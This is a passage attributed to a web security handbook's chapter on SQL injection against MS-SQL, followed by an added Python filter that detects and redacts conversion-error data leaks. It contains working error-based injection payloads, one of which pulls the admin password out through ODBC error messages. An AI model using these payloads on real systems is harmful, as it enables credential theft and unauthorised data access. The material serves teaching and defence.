The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws



Date: 01.01.2022

Chapter 9: Injecting Code



NOTE

MS-SQL allows multiple separate SQL queries to be batched together, optionally using a semicolon character as a separator. This enables you to carry out an entirely separate statement, even using a different verb, via any SQL injection vulnerability where the database is MS-SQL.

Extracting Arbitrary Data

One particularly useful ODBC error message occurs when the database attempts to cast an item of string data to a numeric data type. In this situation, the error message generated actually contains the value of the string item that caused the problem. If error messages are being returned to the browser, this behavior can be a gold mine to an attacker because it allows arbitrary string data to be returned reliably.

It is possible to inject into the WHERE clause of a SELECT statement in such a way as to perform an arbitrary second query and trigger a failed string conversion on the result. One way of doing this is as follows, which in this example returns version information about the database and operating system:

' or 1 in (select @@version)--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) '
to a column of data type int.

More interestingly, given the information already gathered, you could retrieve the password of the admin user as follows:

' or 1 in (select password from users where username='admin')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value '0wned' to a column of data type int.
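A detection-side view of the behavior described above, as an added example that is not from the book: a Python filter that finds SQL Server conversion errors echoing string data in response bodies and masks the echoed value before the body is stored. It goes beyond the SQL Server 2000 wording quoted here by also matching the later "Conversion failed" wording; the function names and sample responses are constructed for illustration.

```python
import re

Q = "['\u2018\u2019]"  # straight or typographic quotes around the echoed value
# SQL Server conversion error that echoes the offending string. The first
# alternative is the SQL Server 2000 wording quoted above, the second is the
# wording used by later versions.
LEAK_RE = re.compile(
    r"(?:Syntax\s+error\s+converting|Conversion\s+failed\s+when\s+converting)"
    r"\s+the\s+(?P<src>n?varchar|n?char)\s+value\s+" + Q +
    r"(?P<value>.*?)" + Q +
    r"\s+to\s+(?:a\s+column\s+of\s+)?data\s+type\s+(?P<dst>\w+)",
    re.IGNORECASE | re.DOTALL,
)

def find_leaks(body):
    """One finding per conversion error in body that echoes string data."""
    return [{"src": m["src"].lower(), "dst": m["dst"].lower(),
             "leaked_chars": len(m["value"])} for m in LEAK_RE.finditer(body)]

def _mask(m):
    # Rebuild the matched error text with only the echoed value replaced.
    start, end = m.start("value") - m.start(), m.end("value") - m.start()
    text = m.group(0)
    return text[:start] + "[redacted]" + text[end:]

def redact(body):
    """Body with every echoed value masked, so alerts do not re-leak it."""
    return LEAK_RE.sub(_mask, body)

def triage(responses):
    """Request ids whose response body disclosed database content."""
    return [rid for rid, body in responses if find_leaks(body)]

# Constructed sample responses (request id, body); error texts follow the page.
SAMPLE = [
    ("req-1", "<html><body>Welcome back</body></html>"),
    ("req-2", "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error "
              "converting\nthe varchar value '0wned' to a column of data type int."),
    ("req-3", "Conversion failed when converting the nvarchar value "
              "'Microsoft SQL Server' to data type int."),
    ("req-4", "Syntax error converting the varchar value \u2018it's\u2019 "
              "to a column of data type int."),
]

if __name__ == "__main__":
    print(triage(SAMPLE))
    for _, body in SAMPLE[1:]:
        print(find_leaks(body), "->", redact(body))
```

Any hit from `triage` means detailed database errors are reaching the client, which is the condition the technique above depends on.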



TIP

